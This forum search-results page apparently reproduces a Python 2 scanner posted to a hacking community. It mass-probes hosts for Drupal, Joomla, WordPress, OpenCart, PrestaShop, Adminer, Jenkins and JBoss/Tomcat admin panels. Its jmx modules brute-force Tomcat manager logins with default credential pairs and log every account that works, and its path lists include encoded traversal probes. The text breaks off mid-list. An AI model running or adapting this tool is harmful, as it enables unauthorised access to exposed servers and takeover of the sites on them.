Jump to content
×
×
  • Create New...

Search the Community

Showing results for tags 'vulnerability'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • HOME
    • Shell_Meet
    • Shell_Talk
    • Board Meet
    • Announcements and Updates
    • Shell_Update
    • Pending Approvals
    • Member Introductions
    • Shell_Crew Support
  • HACKING & EXPLOITATION
    • Ctf Updates & Walkthroughs
    • Latest CVE-Info
    • Android/IOS Pentesting
    • Reverse Engineering
    • IoT Exploitation
    • Malware Analysis
    • API Pentesting
    • Cloud Security
    • Off-topic Lounge
  • CAREER
    • Internships
    • Career Discussion
    • Mentorship
    • Career Guidance
  • BUG BOUNTY
    • P5 (Informational Bugs)
    • P4 (Low-Level Bugs)
    • P3-P2 (High-Level Bugs)
    • P2-P1 (Critical Bugs)
    • Vulnerability Chaining
    • Report Writing
    • Personal Hunting Methodology
  • PROGRAMMING
    • Front-End Development
    • Scripting
    • Backend-Development
    • Application Development
    • Linux Kernel and OS Developers
    • Hardware Programming
    • DevOps
    • Queries Assessment
  • PROFESSIONAL CYBERSEC
    • Penetration Testing (Risk Assessment)
    • Red Teaming (Risk Assessment)
    • Blue Teaming (Risk Assessment)
    • Exploit Development (Risk Assessment)
    • OSINT-External and Internal (Threat Intelligence)
    • IOC (Threat Intelligence)
    • Awareness (Reinforcement)
    • Digital Forensics (Security Operations)
    • SOC & SIEM
  • Bug-Hunters's Resources
  • Open Source Contribution's Topics
  • Pentesting's Resources
  • SDR & AutoMobile Pentesting's Topics
  • Networking's Topics
  • Networking's Network Resources

Blogs

  • Open Source Contribution's Blogs

Categories

  • Bug-Hunt
  • Penetration Testing
  • Blue-Teaming

Product Groups

There are no results to display.

Categories

  • Pentesting
  • Bug-POC Videos
  • CTF-Walkthrough
  • Scripting
  • Bug-Hunters's Videos
  • SDR & AutoMobile Pentesting's Videos
  • Networking's Videos

Categories

  • Pentesting
  • Bug-Hunting
  • SDR & AutoMobile Pentesting's Tutorials

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 2 results

  1. #!/usr/bin/python #-*- coding:utf-8 -*- import inspect import re import urllib2 import threading import sys import ssl import requests class read_file_ip(): """ Read File line per line """ def __init__(self, file): try: self.file = open(file, "r+") except: print "[ERROR] Cant open File" self.actual_line = "" def next_line(self): """ Moves the pointer to the next line and returns this """ try: line = self.file.next().rstrip() except StopIteration: line = False except AttributeError: line = False self.actual_line = line return line def actual_line(self): """ Returns actual line, doesnt moves the pointer """ return self.actual_line class tools(): """ Here you can store all functions which you want to use a few times """ @staticmethod def logging(file, value): """ Log something to a file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() @staticmethod def create_http_url(host, port, file = "/", prot = "http"): """ Create Url for Urllib2 """ return "%s://%s:%s%s" %(prot, host, port, file) @staticmethod def http_get(ip, port, file = "", timeout = None, url = None, ssl = False): """ GET HTTP Status Code, html and url from url or ip + file """ if url == None: if ssl == False: prot = "http" else: prot = "https" if port == None: port = 80 if file == None: raise("ERR: func_http_get: no url or file specified") url = "%s://%s:%s%s" %(prot, ip, port, file) if timeout == None: timeout = scan.conf_timeout try: conn = urllib2.urlopen(url, timeout = None) except urllib2.HTTPError as e: return [True, e.code, url, e.read()] except urllib2.URLError as e: return [False, None, None, None] except urllib2.socket.timeout as e: return [False, None, None, None] except requests.exceptions.SSLError as e: return e.message return [True, conn.code, url, conn.read()] @staticmethod def get_string_between(string, start, end): try: end_of_string = string.index(start) + len(start) start_of_string = string.index(end, end_of_string) return string[end_of_string:start_of_string] except: return False @staticmethod def get_http_headers(url, timeout = None): """ Get Http Headers and compare them to dictionary which will be returned """ main_url = url target_headers_dict = {} if timeout == None: timeout = scan.conf_timeout try: target_urllib = urllib2.urlopen(main_url, timeout = timeout) except urllib2.HTTPError as e: return {"Error" : e} except urllib2.URLError as e: return {"Error" : e} except urllib2.socket.timeout as e: return {"Error" : e} except: return {"Error" : "Unknown"} target_headers = target_urllib.info().headers for i in target_headers: i = i.strip() items = i.split(": ") try: target_headers_dict[items[0]] = items[1] except IndexError: print items #Heres some bug but to lazy to fix it ^^ Fixxed with try but no nice code... return target_headers_dict def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None): """ Check if any item from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] for i in blacklist: print i if any(k in string for k in whitelist) and any(k not in string for k in blacklist): return True else: return False def regex_not_match(string, regex): """ Returns True if regex does NOT match, false if it matches. Needed for check_if_any_reg_from_arr_in_string() """ if re.match(regex, string) == None: return True else: return False def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None): """ Checks if any regex from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist): return True else: return False @staticmethod def http_basic_auth(theurl, username, password): passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # this creates a password manager passman.add_password(None, theurl, username, password) # because we have put None at the start it will always # use this username/password combination for urls # for which `theurl` is a super-url authhandler = urllib2.HTTPBasicAuthHandler(passman) # create the AuthHandler opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) # All calls to urllib2.urlopen will now use our handler # Make sure not to include the protocol in with the URL, or # HTTPPasswordMgrWithDefaultRealm will be very confused. # You must (of course) use it when fetching the page though. try: pagehandle = urllib2.urlopen(theurl) except urllib2.HTTPError as e: return [False, e] # authentication is now handled automatically for us return [True, pagehandle.read()] class scan(): """ Class which does the Scanning Part. Here you can also add new scan modules. """ def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them ############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : "unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart and add. paths to exploits ! # by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], "marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : ["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", 